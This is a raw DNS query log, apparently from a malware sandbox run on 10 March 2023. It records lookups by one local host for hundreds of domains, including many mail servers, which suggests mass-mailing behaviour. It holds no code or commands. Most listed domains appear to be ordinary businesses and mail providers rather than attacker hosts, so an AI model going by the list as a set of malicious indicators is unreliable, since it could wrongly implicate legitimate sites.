                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.957206964 CET192.168.2.68.8.8.80xf05Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:02.356892109 CET192.168.2.68.8.8.80x62beStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:03.536736012 CET192.168.2.68.8.8.80xade1Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:04.929378033 CET192.168.2.68.8.8.80x4590Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.062412024 CET192.168.2.68.8.8.80xa4eaStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.414983034 CET192.168.2.68.8.8.80x8eadStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.856892109 CET192.168.2.68.8.8.80x49c7Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.074444056 CET192.168.2.68.8.8.80x44a4Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.316169024 CET192.168.2.68.8.8.80x1d54Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.080149889 CET192.168.2.68.8.8.80x2d80Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.151097059 CET192.168.2.68.8.8.80x2b54Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.554366112 CET192.168.2.68.8.8.80xd15bStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.737760067 CET192.168.2.68.8.8.80x556dStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.851604939 CET192.168.2.68.8.8.80xcc5Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.022326946 CET192.168.2.68.8.8.80x1e5fStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.496028900 CET192.168.2.68.8.8.80x4dc4Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.538264990 CET192.168.2.68.8.8.80x5626Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:11.721106052 CET192.168.2.68.8.8.80xb41Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.043211937 CET192.168.2.68.8.8.80xc750Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.303894043 CET192.168.2.68.8.8.80x7a0eStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.327096939 CET192.168.2.68.8.8.80xee3Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.460463047 CET192.168.2.68.8.8.80xb059Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.645806074 CET192.168.2.68.8.8.80x4d5cStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.997323990 CET192.168.2.68.8.8.80xefc2Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:13.299143076 CET192.168.2.68.8.8.80x602fStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:13.943088055 CET192.168.2.68.8.8.80xb5d1Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.186249018 CET192.168.2.68.8.8.80x7440Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.637012005 CET192.168.2.68.8.8.80x3875Standard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.966522932 CET192.168.2.68.8.8.80x4718Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.996144056 CET192.168.2.68.8.8.80xece9Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:15.303558111 CET192.168.2.68.8.8.80xe017Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:15.838747978 CET192.168.2.68.8.8.80xb65aStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:16.968349934 CET192.168.2.68.8.8.80x4df2Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.088449955 CET192.168.2.68.8.8.80xff88Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.552109003 CET192.168.2.68.8.8.80xe8feStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.926628113 CET192.168.2.68.8.8.80x1390Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.303371906 CET192.168.2.68.8.8.80x6833Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.484006882 CET192.168.2.68.8.8.80x5ed3Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.526004076 CET192.168.2.68.8.8.80xff8aStandard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.661773920 CET192.168.2.68.8.8.80x6de0Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.671473980 CET192.168.2.68.8.8.80x6dd9Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.715902090 CET192.168.2.68.8.8.80xf603Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.725966930 CET192.168.2.68.8.8.80xc6fdStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.728018999 CET192.168.2.68.8.8.80xf45dStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.728949070 CET192.168.2.68.8.8.80x10adStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.934592009 CET192.168.2.68.8.8.80x8a1eStandard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:22.434993982 CET192.168.2.68.8.8.80xf240Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:24.837080956 CET192.168.2.68.8.8.80xf6f6Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:25.263120890 CET192.168.2.68.8.8.80x74ecStandard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:25.689666033 CET192.168.2.68.8.8.80x5ebeStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:26.377932072 CET192.168.2.68.8.8.80x2166Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:26.383418083 CET192.168.2.68.8.8.80x322eStandard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:26.728671074 CET192.168.2.68.8.8.80x27edStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:27.315256119 CET192.168.2.68.8.8.80xa129Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:27.822340965 CET192.168.2.68.8.8.80x7c67Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:28.686135054 CET192.168.2.68.8.8.80x47c8Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:28.911037922 CET192.168.2.68.8.8.80x8241Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:30.562216043 CET192.168.2.68.8.8.80xbc54Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:30.615418911 CET192.168.2.68.8.8.80xb0d3Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:31.697659969 CET192.168.2.68.8.8.80xe1ddStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:31.713474035 CET192.168.2.68.8.8.80x2d3dStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:31.715620995 CET192.168.2.68.8.8.80xe24Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:32.933657885 CET192.168.2.68.8.8.80x57a5Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.037338972 CET192.168.2.68.8.8.80xd7e9Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.382674932 CET192.168.2.68.8.8.80x5ec1Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:34.335063934 CET192.168.2.68.8.8.80xc67dStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:35.404310942 CET192.168.2.68.8.8.80x2d0fStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:35.405129910 CET192.168.2.68.8.8.80x20f0Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:35.661623955 CET192.168.2.68.8.8.80xb78bStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:35.973041058 CET192.168.2.68.8.8.80xcfe2Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:36.284640074 CET192.168.2.68.8.8.80xac1dStandard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:36.662256956 CET192.168.2.68.8.8.80xd2c4Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:37.697599888 CET192.168.2.68.8.8.80x55edStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.267230988 CET192.168.2.68.8.8.80x22e3Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.379288912 CET192.168.2.68.8.8.80xd181Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.664170980 CET192.168.2.68.8.8.80x5d2cStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.664417028 CET192.168.2.68.8.8.80x6fcStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.664582968 CET192.168.2.68.8.8.80x1bc2Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.664921999 CET192.168.2.68.8.8.80xfda2Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.669197083 CET192.168.2.68.8.8.80xc175Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.678458929 CET192.168.2.68.8.8.80xf154Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.683650970 CET192.168.2.68.8.8.80xde28Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.704036951 CET192.168.2.68.8.8.80xea19Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.705929995 CET192.168.2.68.8.8.80x1dceStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.707376957 CET192.168.2.68.8.8.80x339dStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.946569920 CET192.168.2.68.8.8.80xfa7bStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.043843985 CET192.168.2.68.8.8.80x480bStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.191750050 CET192.168.2.68.8.8.80x1e4eStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.203969002 CET192.168.2.68.8.8.80xe767Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.396821022 CET192.168.2.68.8.8.80xbe28Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.482418060 CET192.168.2.68.8.8.80x3c30Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.483731031 CET192.168.2.68.8.8.80x9c30Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.484319925 CET192.168.2.68.8.8.80x3ca4Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.484469891 CET192.168.2.68.8.8.80xdee7Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.484893084 CET192.168.2.68.8.8.80x96fbStandard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.485255957 CET192.168.2.68.8.8.80xc6d5Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.485456944 CET192.168.2.68.8.8.80x41faStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.492533922 CET192.168.2.68.8.8.80x9e7dStandard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.493149042 CET192.168.2.68.8.8.80x7872Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.493490934 CET192.168.2.68.8.8.80x1ab9Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.514267921 CET192.168.2.68.8.8.80x969dStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.575444937 CET192.168.2.68.8.8.80x2011Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.577866077 CET192.168.2.68.8.8.80x3472Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.584258080 CET192.168.2.68.8.8.80xaf65Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.620249033 CET192.168.2.68.8.8.80xdddaStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.668421030 CET192.168.2.68.8.8.80x762bStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.694621086 CET192.168.2.68.8.8.80xe460Standard query (0)in1.smtp.messaginguser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.699310064 CET192.168.2.68.8.8.80xe8d0Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.703089952 CET192.168.2.68.8.8.80xadd5Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.792187929 CET192.168.2.68.8.8.80x2b6dStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.807621002 CET192.168.2.68.8.8.80x5c01Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.817047119 CET192.168.2.68.8.8.80x8011Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.822196007 CET192.168.2.68.8.8.80x2dfaStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.838721991 CET192.168.2.68.8.8.80xd2e4Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.934246063 CET192.168.2.68.8.8.80xeeb9Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.055066109 CET192.168.2.68.8.8.80xfa7bStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.089406013 CET192.168.2.68.8.8.80x3379Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.090280056 CET192.168.2.68.8.8.80xad74Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.091679096 CET192.168.2.68.8.8.80xc23cStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.152149916 CET192.168.2.68.8.8.80x64d3Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.351198912 CET192.168.2.68.8.8.80x2989Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.354281902 CET192.168.2.68.8.8.80x2290Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.534739971 CET192.168.2.68.8.8.80xf758Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.547306061 CET192.168.2.68.8.8.80x8afeStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.965739012 CET192.168.2.68.8.8.80x20efStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.966625929 CET192.168.2.68.8.8.80x8510Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.967099905 CET192.168.2.68.8.8.80x1f70Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.967355013 CET192.168.2.68.8.8.80x7a3aStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.315773964 CET192.168.2.68.8.8.80x6805Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.697643042 CET192.168.2.68.8.8.80x8961Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.698780060 CET192.168.2.68.8.8.80x57d0Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.701884985 CET192.168.2.68.8.8.80x5122Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.936482906 CET192.168.2.68.8.8.80xb1fbStandard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:43.423818111 CET192.168.2.68.8.8.80xede7Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:45.958276033 CET192.168.2.6202.12.27.330x8aStandard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:45.983787060 CET192.168.2.6192.203.230.100xdcStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.006295919 CET192.168.2.6202.12.27.330xbeStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.477175951 CET192.168.2.68.8.8.80xcb0bStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.490066051 CET192.168.2.68.8.8.80x41fbStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.619338036 CET192.168.2.68.8.8.80xebabStandard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.622786045 CET192.168.2.68.8.8.80xa0e0Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.710748911 CET192.168.2.68.8.8.80xe77aStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.717211962 CET192.168.2.68.8.8.80x3402Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.798399925 CET192.168.2.68.8.8.80x7f98Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.798527956 CET192.168.2.68.8.8.80x57d5Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.850471020 CET192.168.2.68.8.8.80x2682Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.856784105 CET192.168.2.68.8.8.80xe64bStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.856995106 CET192.168.2.68.8.8.80xf51aStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.894661903 CET192.168.2.68.8.8.80xec33Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.894855976 CET192.168.2.68.8.8.80xb59eStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.895379066 CET192.168.2.68.8.8.80xa6ecStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.899734020 CET192.168.2.68.8.8.80xad3Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.901550055 CET192.168.2.68.8.8.80x9d5bStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.905127048 CET192.168.2.68.8.8.80x1fd2Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.935000896 CET192.168.2.68.8.8.80x1df7Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.055888891 CET192.168.2.68.8.8.80x3e6cStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.122944117 CET192.168.2.68.8.8.80xee66Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.550630093 CET192.168.2.68.8.8.80xf884Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.575658083 CET192.168.2.68.8.8.80x6355Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.581831932 CET192.168.2.68.8.8.80x60b4Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.618954897 CET192.168.2.68.8.8.80x6301Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.730618000 CET192.168.2.68.8.8.80xe2caStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.797230005 CET192.168.2.68.8.8.80x529cStandard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.883277893 CET192.168.2.68.8.8.80xb6edStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.941361904 CET192.168.2.68.8.8.80x880bStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.301397085 CET192.168.2.68.8.8.80xd318Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.310978889 CET192.168.2.68.8.8.80x7e9aStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.312077999 CET192.168.2.68.8.8.80xa2ccStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.570039034 CET192.168.2.68.8.8.80x87e8Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.574573040 CET192.168.2.68.8.8.80xe6e2Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.613221884 CET192.168.2.68.8.8.80x275dStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.662544966 CET192.168.2.68.8.8.80xf9abStandard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.667346001 CET192.168.2.68.8.8.80x6604Standard query (0)forbin.netA (IP address)IN (0x0001)false
